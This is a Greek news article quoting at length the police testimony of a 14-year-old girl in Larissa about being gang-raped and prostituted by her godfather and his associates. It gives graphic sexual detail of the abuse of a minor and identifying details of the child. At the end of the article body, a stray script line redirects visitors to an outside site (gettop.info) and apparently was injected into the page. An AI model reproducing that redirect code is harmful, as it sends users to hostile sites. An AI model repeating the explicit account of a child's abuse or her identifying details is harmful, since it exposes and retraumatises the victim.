Λάρισα: Σοκάρει η μαρτυρία της 14χρονης – Ανατριχιαστικές περιγραφές για τον βιασμό

0
28

 

Στο διαμέρισμα που ανήκε στον νονό της έζησε την κόλαση η 14χρονη Χριστίνα καθώς ο νονός της με φίλους του την εξέδιδαν για 5 και 10 ευρώ ενώ πρώτα τη βίασαν ομαδικά. Δύο εβδομάδες διήρκεσε το μαρτύριο της ανήλικης που με την κατάθεσή της σοκάρει με τις ανατριχιαστικές περιγραφές των όσων της εκαναν άνθρωποι που όπως της έλεγαν ήθελαν το καλό της.

«Ο Γιάννης μου έβγαλε όλα τα ρούχα, μου έδεσε τα χέρια και τα πόδια με ένα σχοινί, μου έβαλε μια ταινία στο στόμα μου για να μη φωνάζω και με δύναμη με βίασε. Εγώ πονούσα και έκλαιγα. Αφού τελείωσε αυτός, ήρθε από πάνω μου ο Αχιλλέας και επίσης με βίασε. Αφού τελείωσε και αυτός, ήρθε από πάνω μου ο Αρης και με βίασε. Τελευταίος έκανε τα ίδια και ο Νίκος και αφού τελείωσε με ξέλυσαν και μου έβγαλαν την ταινία», λέει στην κατάθεση που έδωσε στους αστυνομικούς η 14χρονη ξεσπώντας πολλές φορές σε κλάματα και σκύβοντας το κεφάλι από ντροπή.

Μέσα από τη δικογραφία που παρουσιάζει το «Πρώτο Θέμα» αποκαλύπτεται το άθλιο αλισβερίσι της διαστροφής που στηνόταν κάθε μέρα στην κεντρική πλατεία της Λάρισας απέναντι από τα δικαστήρια, όπου άνδρες κάθε ηλικίας και εθνικότητας παζάρευαν με τους δήθεν φίλους της για να ξεσπάσουν τα αρρωστημένα τους ένστικτα.

Όπως είπε στην κατάθεσή της η μικρή: «Είμαι 14 χρόνων και τώρα που θα ανοίξουν τα σχολεία θα πάω στην Α’ Γυμνασίου. Οταν ήμουν 11 με έβαλαν σε ίδρυμα στα Γιαννιτσά γιατί με είχε πιάσει η Αστυνομία να πουλάω εικόνες τις οποίες έκλεβα από διάφορες εκκλησίες», λέει ξεκινώντας την κατάθεσή της στους αστυνομικούς, και στη συνέχεια αναφέρεται στο πώς τελικά έφυγε από το ίδρυμα και με τη βοήθεια ενός συγγενικού της προσώπου κατέληξε στη Λάρισα: «Με έφερε στη Λάρισα και με άφησε κάτω από την εκκλησία του Αγίου Αχιλλείου για να μη με πιάσουν οι αστυνόμοι και μου έδωσε 10 ευρώ για να φάω. Στη μάνα μου δεν ήθελα να πάω για να μη με γυρίσουν πάλι στο ίδρυμα. Δύο ημέρες κοιμήθηκα στα παγκάκια και μετά στον δρόμο τυχαία με βρήκε ο νονός μου, Κώστας Καψάλης, που μένει εδώ στη Λάρισα και μου είπε να πάω να μείνω μαζί του στο σπίτι του».

Και συνέχισε περιγράφοντας τον πρώτο ομαδικό βιασμό που βίωσε όταν ένας φίλος του νονού της, ο Γιάννης Γιολδάσης, την έπεισε να ανέβει στο διαμέρισμα του 4ου ορόφου στην ίδια πολυκατοικία για να της κάνει, όπως της είπε, «μια έκπληξη». «Ανέβηκα στο διαμέρισμα, ήταν όλοι άνδρες. Μιλήσαμε όλοι και ο Γιάννης Γιολδάσης έπαιρνε λεφτά από αυτούς. Δεν είδα πόσα.

Ο Αχιλλέας μάλλον έδωσε 20 ευρώ, ο Αρης έδωσε 5 και ο Νίκος 10. Τα έβγαλαν και του τα έδωσαν έξω για να μην τα δω εγώ που ήμουν στην κουζίνα. Μετά ήρθε ο Αχιλλέας στην κουζίνα και μου είπε να πάω στο δωμάτιο, του είπα “δεν θέλω”. Μετά ήρθε ο Γιάννης και μου είπε: “Αυτοί το κορμί σου θέλουν”. Τον ρώτησα “πόσα πήρες Γιάννη;” και μου είπε “δεν θα σου πω”. Με έβαλαν σε ένα ράντζο, ήμουν καθιστή, μου έδεσαν τα χέρια και τα πόδια. Φώναζα λίγο και μου κόλλησαν ταινία στο στόμα. Με ξάπλωσαν, έκλεινα τα μάτια μου για να μη βλέπω. Ηρθαν να πάρουν το κορμί μου. Πρώτος ήρθε ο Αχιλλέας. Φορούσε προφυλακτικό. Ανοιξα λίγο τα πόδια μου και μπήκε από μπροστά. Μετά ήρθε ο Αρης και ο Νίκος. Πρώτος πήρε το κορμί μου ο Γιάννης, έκλαιγα λίγο και στο τέλος μου έβγαλαν την ταινία. Τους φώναζα και μου έλεγαν να το βουλώσω. Ακουσε ο νονός μου τις φωνές και ανέβηκε πάνω. Ρώτησε “τι έγινε;”, ο Γιάννης του είπε πόσα χρήματα πήρε και ο νονός μου τα πήρε και τα πέταξε στα μούτρα του».

Ετσι περιέγραψε την πρώτη της φρικτή εμπειρία η μικρή. Στην κατάθεση που έδωσε στους αστυνομικούς το κοριτσάκι προσθέτει: «Το ίδιο βράδυ ο Γιάννης με πήρε τηλέφωνο και μου είπε ότι κάτι είχε να μου δώσει και ότι έπρεπε να ανέβω πάνω στο σπίτι του. Ξαναπήγα και άκουσα ότι τηλεφώνησε σε κάποιον Τσιγγάνο από τα Ταμπάκικα με το όνομα Σταύρος και μου είπε ότι θα έρθει να πάρει το κορμί μου και εγώ κατάλαβα ότι θα του έδινε και λεφτά. Μετά από λίγο ήρθε αυτός ο Τσιγγάνος, ο Γιάννης μας άφησε μόνους και αυτός ο Τσιγγάνος για να πάω μαζί του άρχισε να μου ρίχνει σφαλιάρες, και με βίασε και αυτός.

Εκτός από αυτούς τους άνδρες που σας είπα ο Γιάννης με ανάγκασε να κοιμηθώ και με άλλους λέγοντάς μου ότι θα με σκοτώσει αν δεν κάνω αυτό που ήθελε. Αφού επικοινωνούσε τηλεφωνικά με διάφορους παππούδες, έκλειναν ραντεβού στη μεγάλη πλατεία έξω από τα δικαστήρια, πήγαινα μαζί με τον Γιάννη εκεί, μου έδειχνε τον κάθε παππού και εγώ τον πλησίαζα, του έλεγα ποια είμαι, πήγαινα στα σπίτια τους και κάναμε έρωτα. Ομως δεν μπορώ να πω με πόσους άνδρες συγκεκριμένα αναγκάστηκα να κοιμηθώ και δεν ξέρω να σας πω πού είναι τα σπίτια τους. Πάντως τελευταία φορά στην κεντρική πλατεία πήγα στις 31 Αυγούστου το πρωί και μου έδειξε ο Γιάννης έναν παππού με τον οποίο πήγαμε στο σπίτι του και κάναμε έρωτα».

Στην ανακρίτρια της Λάρισας η μικρή δέχθηκε να απαντήσει και να περιγράψει με κάθε λεπτομέρεια τα όσα ελάμβαναν χώρα στην κεντρική πλατεία. Στην ερώτηση της ανακρίτριας αν για τα ραντεβού της πλατείας γνώριζε και ο νονός της Κώστας Καψάλης, η μικρή απάντησε καταφατικά. Μάλιστα αναφέρεται και στην περίπτωση ενός «παππού γύρω στα 50-60 με μια τρύπα στον λαιμό. Ο Γιάννης μετά μίλησε πάλι στο τηλέφωνο για να βρει πελάτες. Βρήκε τρεις και το κάναμε εκείνη την ημέρα.

Ο ένας ήταν άσχημος, με πολλά σπυριά, ψηλός. Είχε μουστάκι. Ηταν Πακιστανός, πήρε λεφτά και από αυτόν. Τον λυπήθηκα γιατί ήταν ξένος. Τους συμπαθώ τους Πακιστανούς γιατί δεν μιλούν καλά ελληνικά, μιλούν τη δική τους γλώσσα. Δεν με ανάγκασε αυτός, ήθελα. Ενιωσα αγάπη από αυτόν, δεν ήταν απότομος. Δεν ξέρω πόσα λεφτά του έδωσε. Ο δεύτερος ήταν κοντός, περίπου 18 χρόνων, ξανθός, με καρφάκια, Ελληνας. Ηταν όμορφος και φορούσε ένα σκουλαρίκι καρδιά στο αριστερό αυτί. Εκείνη την ημέρα δεν ήταν μόνο τρεις πελάτες, ήταν και άλλοι. Πάλι στην πλατεία πήγαμε. Ο άλλος ήταν ψηλός, αδύνατος, με μαλλιά-καρφάκια, πράσινα μάτια, ωραίο πρόσωπο».

Το απίστευτο της υπόθεσης είναι, όπως αποκάλυψε η μικρή στην ανακρίτρια, ότι παράλληλα την εξέδιδε και ο νονός της, που την ήθελε μάλιστα και για ερωμένη. «Ηθελε να με πάει στον δικηγόρο τον Παναγιώτη για να μην ξαναγυρίσω στο ίδρυμα και για να πάρει την επιμέλεια και για να μου κάνει έρωτα ο Παναγιώτης. Του άρεσα του Παναγιώτη και ήθελε να μου κάνει έρωτα. Γι’ αυτό με πήγε ο νονός μου, ήμουν μπροστά. Ο Παναγιώτης είχε μια γκαρσονιέρα και ήθελε να με πάει εκεί, αλλά είχε κόσμο. Τελικά πήγα με τον Παναγιώτη, έκανα έρωτα μαζί του. Θέλω να τιμωρηθεί και αυτός. Ο νονός μου πήρε λεφτά από αυτόν, 20 ευρώ, ήμουν μπροστά», ήταν τα τελευταία λόγια της 14χρονης στην ανακρίτρια. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here